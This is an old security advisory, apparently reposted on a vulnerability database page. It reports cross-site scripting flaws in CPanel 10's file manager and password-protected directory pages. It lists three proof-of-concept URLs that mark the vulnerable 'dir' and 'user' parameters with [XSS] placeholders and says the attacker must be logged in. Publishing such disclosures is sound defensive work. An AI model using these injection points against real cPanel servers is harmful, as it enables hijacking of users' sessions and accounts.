Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:15035
HistoryNov 14, 2006 - 12:00 a.m.

CPanel Multiple Cross Site Scription

2006-11-1400:00:00
vulners.com
32

#Aria-Security Team Advisory
#<www.Aria-security.Com For English >
#<www.Aria-Security.net For Persian >
#Original Advisory : http://aria-security.net/advisory/cpanel.txt
#-----------------------------------------------------------
#Software: CPanel
#Tested On CPanel 10
#CPanel file Manager:
#PoC:
http://target.com:2082/frontend/[Servername]/files/seldir.html?dir=[XSS]
#CPanel Password Protect DIRS :
#PoC:
http://target.com:2082/frontend/[servername]/htaccess/newuser.html?user=[XSS]&amp;pass=&amp;dir=A VALID FOLDER
*Press Go Back (hyperlink)
#In Password Protected DIR:
#PoC:
http://www.target:2082/frontend/[servername]/htaccess/newuser.html?user=[XSS]&amp;pass=&amp;dir=[XSS]

#P.S : Attacker must be authenticated

#Contact: [email protected]